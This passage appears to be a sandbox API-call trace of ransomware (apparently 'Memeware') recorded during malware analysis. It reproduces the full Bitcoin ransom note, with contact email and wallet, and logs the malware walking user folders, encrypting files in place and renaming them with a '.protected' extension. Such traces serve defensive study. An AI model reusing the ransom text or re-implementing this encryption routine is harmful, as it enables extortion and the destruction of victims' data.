\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.188] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.189] lstrlenA (lpString="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") returned 684 [0090.189] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.189] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.189] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.189] CloseHandle (hObject=0xd8) returned 1 [0090.189] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.189] lstrcmpiW (lpString1="Office", lpString2="Windows") returned -1 [0090.189] lstrcmpiW (lpString1="Office", lpString2="Program Files") returned -1 [0090.189] lstrcmpiW (lpString1="Office", lpString2="Program Files (x86)") returned -1 [0090.189] lstrcmpiW (lpString1="Office", lpString2="$Recycle.bin") returned 1 [0090.189] lstrcmpiW (lpString1="Office", lpString2="System Volume Information") returned -1 [0090.189] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office") returned 66 [0090.189] lstrcmpW (lpString1="Office", lpString2=".") returned 1 [0090.189] lstrcmpW (lpString1="Office", lpString2="..") returned 1 [0090.189] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\*") returned 68 [0090.189] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.196] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.196] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.196] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.196] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.196] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.196] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\.") returned 68 [0090.196] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.196] FindNextFileW (in: hFindFile=0x47ba50, 
lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.196] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.196] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.196] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.196] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.196] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.196] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\..") returned 69 [0090.196] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.196] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.196] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.196] lstrcmpiW (lpString1="MSO1033.acl", lpString2="Windows") returned -1 [0090.196] lstrcmpiW (lpString1="MSO1033.acl", lpString2="Program Files") returned -1 [0090.196] lstrcmpiW (lpString1="MSO1033.acl", lpString2="Program Files (x86)") returned -1 [0090.196] lstrcmpiW (lpString1="MSO1033.acl", lpString2="$Recycle.bin") returned 1 [0090.196] lstrcmpiW (lpString1="MSO1033.acl", lpString2="System Volume Information") returned -1 [0090.196] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 78 [0090.196] StrStrIW (lpFirst="MSO1033.acl", lpSrch=".protected") returned 0x0 [0090.196] lstrcmpW (lpString1="MSO1033.acl", lpString2="RESTORE_FILES.txt") returned -1 [0090.196] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.196] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295ea04*=0x30) returned 1 [0090.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.200] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 78 [0090.200] StrStrW (lpFirst="MSO1033.acl", lpSrch=".txt") returned 0x0 [0090.200] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 78 [0090.200] StrStrW (lpFirst="MSO1033.acl", lpSrch=".rar") returned 0x0 [0090.200] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 78 [0090.200] StrStrW (lpFirst="MSO1033.acl", lpSrch=".zip") returned 0x0 [0090.200] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0090.202] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.202] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0090.202] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.202] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, 
lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0090.202] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0090.203] CloseHandle (hObject=0x14c) returned 1 [0090.203] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.protected") returned 88 [0090.203] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl.protected")) returned 1 [0090.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.204] lstrcmpiW (lpString1="Recent", lpString2="Windows") returned -1 [0090.204] lstrcmpiW (lpString1="Recent", lpString2="Program Files") returned 1 [0090.204] lstrcmpiW (lpString1="Recent", lpString2="Program Files (x86)") returned 1 [0090.204] lstrcmpiW (lpString1="Recent", lpString2="$Recycle.bin") returned 1 [0090.204] lstrcmpiW (lpString1="Recent", lpString2="System Volume Information") returned -1 [0090.204] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned 73 [0090.204] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0090.204] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0090.204] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*") returned 75 [0090.204] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.204] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.204] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.204] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.204] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.204] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.204] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\.") returned 75 [0090.205] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.205] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.205] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.205] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.205] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.205] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.205] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.205] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\..") returned 76 [0090.205] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.205] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.205] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.205] lstrcmpiW (lpString1="Global.LNK", lpString2="Windows") returned -1 [0090.205] lstrcmpiW 
(lpString1="Global.LNK", lpString2="Program Files") returned -1 [0090.205] lstrcmpiW (lpString1="Global.LNK", lpString2="Program Files (x86)") returned -1 [0090.205] lstrcmpiW (lpString1="Global.LNK", lpString2="$Recycle.bin") returned 1 [0090.205] lstrcmpiW (lpString1="Global.LNK", lpString2="System Volume Information") returned -1 [0090.205] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK") returned 84 [0090.205] StrStrIW (lpFirst="Global.LNK", lpSrch=".protected") returned 0x0 [0090.205] lstrcmpW (lpString1="Global.LNK", lpString2="RESTORE_FILES.txt") returned -1 [0090.205] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.205] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.206] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK") returned 84 [0090.206] StrStrW (lpFirst="Global.LNK", lpSrch=".txt") returned 0x0 [0090.206] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK") returned 84 [0090.206] StrStrW (lpFirst="Global.LNK", lpSrch=".rar") returned 0x0 [0090.206] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK") returned 84 [0090.206] StrStrW 
(lpFirst="Global.LNK", lpSrch=".zip") returned 0x0 [0090.206] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x59a, lpOverlapped=0x0) returned 1 [0090.211] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.211] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x59a, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x59a, lpOverlapped=0x0) returned 1 [0090.211] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.212] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.212] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.212] CloseHandle (hObject=0x150) returned 1 [0090.212] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK.protected") returned 94 [0090.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK.protected" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk.protected")) returned 1 [0090.213] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.213] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0090.213] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0090.214] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0090.214] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0090.214] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0090.214] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 83 [0090.214] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0090.214] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0090.214] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.214] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 83 [0090.215] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0090.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 83 [0090.215] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0090.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 83 [0090.215] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0090.215] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x34, lpOverlapped=0x0) returned 1 [0090.216] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffcc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.216] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x34, lpOverlapped=0x0) returned 1 [0090.216] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.216] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.217] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.217] CloseHandle (hObject=0x150) returned 1 [0090.217] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.protected") returned 93 [0090.217] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat.protected")) returned 1 [0090.223] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.223] lstrcmpiW (lpString1="Templates.LNK", lpString2="Windows") returned -1 [0090.223] lstrcmpiW (lpString1="Templates.LNK", lpString2="Program Files") returned 1 [0090.223] lstrcmpiW (lpString1="Templates.LNK", lpString2="Program Files (x86)") returned 1 [0090.223] lstrcmpiW (lpString1="Templates.LNK", lpString2="$Recycle.bin") returned 1 [0090.223] lstrcmpiW (lpString1="Templates.LNK", lpString2="System Volume Information") returned 1 [0090.223] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 87 [0090.223] StrStrIW (lpFirst="Templates.LNK", lpSrch=".protected") returned 0x0 [0090.224] lstrcmpW (lpString1="Templates.LNK", lpString2="RESTORE_FILES.txt") returned 1 [0090.224] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.224] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0x150 [0090.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 87 [0090.224] StrStrW (lpFirst="Templates.LNK", lpSrch=".txt") returned 0x0 [0090.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 87 [0090.224] StrStrW (lpFirst="Templates.LNK", lpSrch=".rar") returned 0x0 [0090.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 87 [0090.225] StrStrW (lpFirst="Templates.LNK", lpSrch=".zip") returned 0x0 [0090.225] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x472, lpOverlapped=0x0) returned 1 [0090.231] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffb8e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.231] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x472, lpOverlapped=0x0) returned 1 [0090.231] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.231] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.231] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.231] CloseHandle (hObject=0x150) returned 1 [0090.232] wnsprintfW (in: 
pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK.protected") returned 97 [0090.232] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk.protected")) returned 1 [0090.233] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.233] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.233] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\RESTORE_FILES.txt") returned 91 [0090.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 